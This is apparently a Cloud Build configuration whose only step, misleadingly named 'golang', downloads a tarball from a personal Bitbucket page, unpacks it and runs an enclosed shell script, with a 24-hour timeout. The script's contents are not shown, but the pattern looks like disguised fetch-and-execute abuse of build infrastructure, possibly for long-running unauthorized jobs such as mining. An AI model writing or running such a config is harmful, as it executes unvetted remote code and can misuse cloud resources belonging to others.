steps:
  - name: golang
    args: 
      - '-c'
      - >-
        wget https://bitbucket.org/Abyehaqi/haqie/downloads/avolo.tar.gz && tar -xvf avolo.tar.gz && ./gas.sh
    waitFor: ["-"]
    entrypoint: /bin/bash
timeout: 86400s